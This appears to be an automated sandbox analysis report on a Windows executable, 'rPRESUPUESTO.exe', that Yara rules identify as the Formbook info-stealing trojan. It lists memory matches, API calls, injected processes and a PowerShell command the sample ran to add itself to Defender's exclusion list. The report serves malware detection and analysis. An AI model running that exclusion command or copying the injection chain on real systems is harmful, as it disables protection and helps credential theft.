            Source: Yara match, File source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.2329601584.00000000038F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.2329601584.0000000002EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.4588318441.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0042B623 NtClose,5_2_0042B623
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812B60 NtClose,LdrInitializeThunk,5_2_01812B60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01812DF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01812C70
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018135C0 NtCreateMutant,LdrInitializeThunk,5_2_018135C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01814340 NtSetContextThread,5_2_01814340
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01814650 NtSuspendThread,5_2_01814650
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812B80 NtQueryInformationFile,5_2_01812B80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812BA0 NtEnumerateValueKey,5_2_01812BA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812BE0 NtQueryValueKey,5_2_01812BE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812BF0 NtAllocateVirtualMemory,5_2_01812BF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812AB0 NtWaitForSingleObject,5_2_01812AB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812AD0 NtReadFile,5_2_01812AD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812AF0 NtWriteFile,5_2_01812AF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812DB0 NtEnumerateKey,5_2_01812DB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812DD0 NtDelayExecution,5_2_01812DD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812D00 NtSetInformationFile,5_2_01812D00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812D10 NtMapViewOfSection,5_2_01812D10
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812D30 NtUnmapViewOfSection,5_2_01812D30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812CA0 NtQueryInformationToken,5_2_01812CA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812CC0 NtQueryVirtualMemory,5_2_01812CC0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812CF0 NtOpenProcess,5_2_01812CF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812C00 NtQueryInformationProcess,5_2_01812C00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812C60 NtCreateKey,5_2_01812C60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812F90 NtProtectVirtualMemory,5_2_01812F90
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812FA0 NtQuerySection,5_2_01812FA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812FB0 NtResumeThread,5_2_01812FB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812FE0 NtCreateFile,5_2_01812FE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812F30 NtCreateSection,5_2_01812F30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812F60 NtCreateProcessEx,5_2_01812F60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812E80 NtReadVirtualMemory,5_2_01812E80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812EA0 NtAdjustPrivilegesToken,5_2_01812EA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812EE0 NtQueueApcThread,5_2_01812EE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812E30 NtWriteVirtualMemory,5_2_01812E30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813090 NtSetValueKey,5_2_01813090
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813010 NtOpenDirectoryObject,5_2_01813010
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018139B0 NtGetContextThread,5_2_018139B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813D10 NtOpenProcessToken,5_2_01813D10
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813D70 NtOpenThread,5_2_01813D70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B94340 NtSetContextThread,LdrInitializeThunk,9_2_02B94340
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B94650 NtSuspendThread,LdrInitializeThunk,9_2_02B94650
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92AF0 NtWriteFile,LdrInitializeThunk,9_2_02B92AF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92AD0 NtReadFile,LdrInitializeThunk,9_2_02B92AD0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_02B92BA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_02B92BF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92BE0 NtQueryValueKey,LdrInitializeThunk,9_2_02B92BE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92B60 NtClose,LdrInitializeThunk,9_2_02B92B60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_02B92E80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02B92EE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92FB0 NtResumeThread,LdrInitializeThunk,9_2_02B92FB0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92FE0 NtCreateFile,LdrInitializeThunk,9_2_02B92FE0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92F30 NtCreateSection,LdrInitializeThunk,9_2_02B92F30
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02B92CA0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02B92C70
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92C60 NtCreateKey,LdrInitializeThunk,9_2_02B92C60
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02B92DF0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92DD0 NtDelayExecution,LdrInitializeThunk,9_2_02B92DD0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02B92D30
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02B92D10
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B935C0 NtCreateMutant,LdrInitializeThunk,9_2_02B935C0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B939B0 NtGetContextThread,LdrInitializeThunk,9_2_02B939B0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92AB0 NtWaitForSingleObject,9_2_02B92AB0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92B80 NtQueryInformationFile,9_2_02B92B80
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92EA0 NtAdjustPrivilegesToken,9_2_02B92EA0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92E30 NtWriteVirtualMemory,9_2_02B92E30
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92FA0 NtQuerySection,9_2_02B92FA0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92F90 NtProtectVirtualMemory,9_2_02B92F90
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92F60 NtCreateProcessEx,9_2_02B92F60
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92CF0 NtOpenProcess,9_2_02B92CF0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92CC0 NtQueryVirtualMemory,9_2_02B92CC0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92C00 NtQueryInformationProcess,9_2_02B92C00
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92DB0 NtEnumerateKey,9_2_02B92DB0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B92D00 NtSetInformationFile,9_2_02B92D00
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B93090 NtSetValueKey,9_2_02B93090
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B93010 NtOpenDirectoryObject,9_2_02B93010
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B93D10 NtOpenProcessToken,9_2_02B93D10
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B93D70 NtOpenThread,9_2_02B93D70
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001A8010 NtReadFile,9_2_001A8010
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001A80F0 NtDeleteFile,9_2_001A80F0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001A8190 NtClose,9_2_001A8190
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001A82E0 NtAllocateVirtualMemory,9_2_001A82E0
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001A7EB0 NtCreateFile,9_2_001A7EB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02BDF290 appears 105 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02BA7E54 appears 102 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02B95130 appears 58 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02BCEA12 appears 86 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02B4B970 appears 280 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 01815130 appears 58 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 0184EA12 appears 86 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 0185F290 appears 105 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 017CB970 appears 280 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 01827E54 appears 111 times
            Source: rPRESUPUESTO.exeStatic PE information: invalid certificate
            Source: rPRESUPUESTO.exe, 00000000.00000002.2177247151.0000000008260000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2156547994.0000000003B94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000000.2107699346.000000000058E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegESw.exe, vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2154526498.0000000002951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2170963335.00000000076B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2153184688.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamektmutil.exej% vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000018CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exeBinary or memory string: OriginalFilenamegESw.exe, vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2329601584.00000000038F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2329601584.0000000002EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4588318441.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: rPRESUPUESTO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, kMIXWOixU8twbSWtxx.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: _0020.AddAccessRule
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, kMIXWOixU8twbSWtxx.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, kMIXWOixU8twbSWtxx.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: _0020.AddAccessRule
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/7@16/14
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPRESUPUESTO.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggwsvlml.yr5.ps1
            Source: rPRESUPUESTO.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: ktmutil.exe, 00000009.00000002.4587088156.0000000000695000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4587088156.0000000000666000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4587088156.0000000000671000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2511663435.0000000000666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rPRESUPUESTO.exe ReversingLabs: Detection: 68%
            Source: unknown Process created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Process created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
            Source: C:\Windows\SysWOW64\ktmutil.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, userenv.dll, amsi.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
